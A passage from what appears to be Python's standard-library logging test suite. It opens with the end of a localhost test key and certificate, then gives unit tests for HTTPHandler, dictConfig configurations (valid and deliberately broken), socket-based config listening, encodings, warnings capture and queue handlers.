MIICXQIBAAKBgQDGT4xS5r91rbLJQK2nUDenBhBG6qFk+bVOjuAGC/LSHlAoBnvG
zQG3agOG+e7c5z2XT8m2ktORLqG3E4mYmbxgyhDrzP6ei2Anc+pszmnxPoK3Puh5
aXV+XKt0bU0C1m2+ACmGGJ0t3P408art82nOxBw8ZHgIg9Dtp6xIUCyOqwIDAQAB
AoGBAJFTnFboaKh5eUrIzjmNrKsG44jEyy+vWvHN/FgSC4l103HxhmWiuL5Lv3f7
0tMp1tX7D6xvHwIG9VWvyKb/Cq9rJsDibmDVIOslnOWeQhG+XwJyitR0pq/KlJIB
5LjORcBw795oKWOAi6RcOb1ON59tysEFYhAGQO9k6VL621gRAkEA/Gb+YXULLpbs
piXN3q4zcHzeaVANo69tUZ6TjaQqMeTxE4tOYM0G0ZoSeHEdaP59AOZGKXXNGSQy
2z/MddcYGQJBAMkjLSYIpOLJY11ja8OwwswFG2hEzHe0cS9bzo++R/jc1bHA5R0Y
i6vA5iPi+wopPFvpytdBol7UuEBe5xZrxWMCQQCWxELRHiP2yWpEeLJ3gGDzoXMN
PydWjhRju7Bx3AzkTtf+D6lawz1+eGTuEss5i0JKBkMEwvwnN2s1ce+EuF4JAkBb
E96h1lAzkVW5OAfYOPY8RCPA90ZO/hoyg7PpSxR0ECuDrgERR8gXIeYUYfejBkEa
rab4CfRoVJKKM28Yq/xZAkBvuq670JRCwOgfUTdww7WpdOQBYPkzQccsKNCslQW8
/DyW6y06oQusSENUvynT6dr3LJxt/NgZPhZX2+k1eYDV
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIICGzCCAYSgAwIBAgIJAIq84a2Q/OvlMA0GCSqGSIb3DQEBBQUAMBQxEjAQBgNV
BAMTCWxvY2FsaG9zdDAeFw0xMTA1MjExMDIzMzNaFw03NTAzMjEwMzU1MTdaMBQx
EjAQBgNVBAMTCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA
xk+MUua/da2yyUCtp1A3pwYQRuqhZPm1To7gBgvy0h5QKAZ7xs0Bt2oDhvnu3Oc9
l0/JtpLTkS6htxOJmJm8YMoQ68z+notgJ3PqbM5p8T6Ctz7oeWl1flyrdG1NAtZt
vgAphhidLdz+NPGq7fNpzsQcPGR4CIPQ7aesSFAsjqsCAwEAAaN1MHMwHQYDVR0O
BBYEFLWaUPO6N7efGiuoS9i3DVYcUwn0MEQGA1UdIwQ9MDuAFLWaUPO6N7efGiuo
S9i3DVYcUwn0oRikFjAUMRIwEAYDVQQDEwlsb2NhbGhvc3SCCQCKvOGtkPzr5TAM
BgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAMK5whPjLNQK1Ivvk88oqJqq
4f889OwikGP0eUhOBhbFlsZs+jq5YZC2UzHz+evzKBlgAP1u4lP/cB85CnjvWqM+
1c/lywFHQ6HOdDeQ1L72tSYMrNOG4XNmLn0h7rx6GoTU7dcFRfseahBCq8mv0IDt
IRbTpvlHWPjsSvHz0ZOH
-----END CERTIFICATE-----"""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
fd, fn = tempfile.mkstemp()
os.close(fd)
with open(fn, 'w') as f:
f.write(self.PEMFILE)
sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslctx.load_cert_chain(fn)
os.unlink(fn)
except ImportError:
sslctx = None
else:
sslctx = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client)
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
